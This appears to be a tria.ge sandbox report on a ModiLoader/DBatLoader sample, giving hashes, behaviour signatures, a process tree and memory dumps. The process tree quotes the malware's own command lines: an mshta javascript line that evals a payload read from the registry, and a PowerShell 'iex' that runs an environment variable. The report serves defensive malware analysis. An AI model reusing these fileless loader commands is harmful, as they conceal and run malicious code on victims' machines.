Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    142s
  • max time network
    162s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/10/2022, 01:27

General

  • Target

    b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226.exe

  • Size

    350KB

  • MD5

    33e4035e409d8b1f24f6dbb42fbac637

  • SHA1

    b1f91d896bf59b434cc164ea8dd440a82edbb543

  • SHA256

    b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226

  • SHA512

    7a68fe0be6e4ff29de7d9e563ddd3506d30a84fc76e1b57cc382db9043d54b44a5d61ad90352f1e8a957bc4b707e89584711ebfcbee926eed5d6a7df4002e08d

  • SSDEEP

    6144:vZFPzNJtUTidCOKQzHaHXrFnk8iEgxeBgOCF+dg384dyzKX/GUaokGd:vvPzNJtUTidCMa3Rnk8iHxeBcggdszKh

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226.exe
    "C:\Users\Admin\AppData\Local\Temp\b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226.exe"
    1⤵
      PID:4208
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:zlNt0U4zqT="xOYUjE4QI";l6m=new%20ActiveXObject("WScript.Shell");gDgJkL96FL="ENF7g0h";QsI5F9=l6m.RegRead("HKLM\\software\\Wow6432Node\\6c11Ci\\wnsWfoW9");yxTzAi49K="B8e";eval(QsI5F9);MYLbfQ35x="BZI";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1044
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:tcej
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4168

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4168-139-0x0000000005910000-0x0000000005932000-memory.dmp

      Filesize

      136KB

    • memory/4168-137-0x0000000005300000-0x0000000005336000-memory.dmp

      Filesize

      216KB

    • memory/4168-138-0x0000000005970000-0x0000000005F98000-memory.dmp

      Filesize

      6.2MB

    • memory/4168-140-0x0000000006110000-0x0000000006176000-memory.dmp

      Filesize

      408KB

    • memory/4168-141-0x0000000006180000-0x00000000061E6000-memory.dmp

      Filesize

      408KB

    • memory/4168-142-0x0000000006740000-0x000000000675E000-memory.dmp

      Filesize

      120KB

    • memory/4168-143-0x0000000007F70000-0x00000000085EA000-memory.dmp

      Filesize

      6.5MB

    • memory/4168-144-0x0000000006C40000-0x0000000006C5A000-memory.dmp

      Filesize

      104KB

    • memory/4208-133-0x0000000000400000-0x000000000045D000-memory.dmp

      Filesize

      372KB

    • memory/4208-134-0x0000000002900000-0x00000000029C0000-memory.dmp

      Filesize

      768KB

    • memory/4208-132-0x0000000002440000-0x0000000002468000-memory.dmp

      Filesize

      160KB

    • memory/4208-145-0x0000000002900000-0x00000000029C0000-memory.dmp

      Filesize

      768KB